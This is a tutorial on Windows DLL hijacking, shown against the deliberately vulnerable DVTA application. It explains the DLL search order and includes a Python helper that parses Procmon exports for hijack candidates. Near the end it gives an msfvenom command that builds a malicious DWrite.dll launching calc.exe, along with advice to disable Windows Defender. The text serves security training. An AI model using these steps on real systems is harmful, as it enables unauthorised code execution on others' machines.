DLL hijacking
Dynamic Link Library
A DLL (Dynamic Link Library) is a piece of code that can be used by many different programs. It promotes a modular approach and scales easily.
More on DLLs can be found here in detail.
DLLs are executable code that is loaded into RAM when an application needs it. The directories searched for DLLs are set by Windows environment variables, and if an application does not reference a DLL by its absolute path, it searches the system for it. If an attacker has replaced a valid DLL with a malicious one of the same name (assuming the attacker has write permission in the required directory), the application ends up executing the malicious code. This is called DLL hijacking.
DLL hijacking works like any other package hijack, because a DLL is searched for in the same pattern (with some variations, of course) as any other package. The search proceeds in the following order:
1. The directory from which the application was executed.
2. The current working directory.
3. The system folder (C:\Windows\System32).
4. The directories defined by the PATH environment variable.
If an application has to load a DLL that is present in the System32 folder, but the attacker can place a DLL of the same name in the directory where the application is located, then the attacker's DLL will be found first and executed.
Procmon from the Sysinternals suite can help identify the DLLs that the application tried to load from its own directory but did not find there.
Those DLLs are the ones to target, provided we have write permission on that directory.
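To make the Procmon step repeatable, the following added example (not code from the original page or from DVTA) parses a Procmon CSV export and lists every DLL the process looked for in its own directory without finding it, together with where it was eventually loaded from. It assumes Procmon's default export columns and a hypothetical install path C:\Tools\DVTA; the CSV rows are constructed sample data, not a real capture.

```python
import csv
import io
import ntpath
from collections import defaultdict

# Constructed Procmon CSV export (default export columns) of a DVTA start-up.
# These rows are illustrative sample data, not a real capture.
SAMPLE_PROCMON_CSV = r'''"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"10:00:01.0001","DVTA.exe","4321","CreateFile","C:\Tools\DVTA\DWrite.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"10:00:01.0002","DVTA.exe","4321","CreateFile","C:\Windows\System32\DWrite.dll","SUCCESS","Desired Access: Read Attributes"
"10:00:01.0003","DVTA.exe","4321","CreateFile","C:\Tools\DVTA\DVTA.exe.config","NAME NOT FOUND","Desired Access: Read Attributes"
"10:00:01.0004","DVTA.exe","4321","CreateFile","C:\Tools\DVTA\Newtonsoft.Json.dll","SUCCESS","Desired Access: Read Attributes"
"10:00:01.0005","DVTA.exe","4321","CreateFile","C:\Tools\DVTA\helper.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"10:00:01.0006","explorer.exe","1234","CreateFile","C:\Tools\DVTA\other.dll","NAME NOT FOUND","Desired Access: Read Attributes"
'''


def hijack_candidates(csv_text, process_name, app_dir):
    """Map each DLL the process looked for in its own directory and did not
    find (NAME NOT FOUND) to the paths it was then loaded from (SUCCESS).
    An empty list means the DLL was never found anywhere. In both cases the
    application would pick up a same-named DLL placed in app_dir, so a
    writable app_dir plus such a DLL is the condition to fix (or to report)."""
    app_dir = app_dir.rstrip("\\").lower()
    missing_in_app_dir = set()
    loaded_from = defaultdict(list)
    for row in csv.DictReader(io.StringIO(csv_text)):
        # Only file-open events of the target process for .dll paths are relevant.
        if row["Process Name"].lower() != process_name.lower() or row["Operation"] != "CreateFile":
            continue
        path = row["Path"]
        name = ntpath.basename(path).lower()
        if not name.endswith(".dll"):
            continue
        directory = ntpath.dirname(path).lower()
        if row["Result"] == "NAME NOT FOUND" and directory == app_dir:
            missing_in_app_dir.add(name)
        elif row["Result"] == "SUCCESS" and directory != app_dir:
            loaded_from[name].append(path)
    return {name: loaded_from.get(name, []) for name in sorted(missing_in_app_dir)}


if __name__ == "__main__":
    for dll, found_at in hijack_candidates(SAMPLE_PROCMON_CSV, "DVTA.exe", r"C:\Tools\DVTA").items():
        print(f"{dll}: not in app dir, loaded from {found_at or 'nowhere'}")
```

On a real export, run it against the CSV saved from Procmon with a filter on the process name, and then check the directory's ACL: the finding only matters if a low-privileged user can write there.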
In the case of DVTA, DWrite.dll will work. Create a DLL file with msfvenom on a Linux machine:
msfvenom -f dll -p windows/exec CMD="C:\windows\system32\calc.exe" -o DWrite.dll
Now place this DLL in DVTA's directory. Remember that Windows Virus & threat protection needs to be turned off for this, as the DLL will be identified as a virus and Windows will not allow it.
Now when you run DVTA, the calculator will pop up.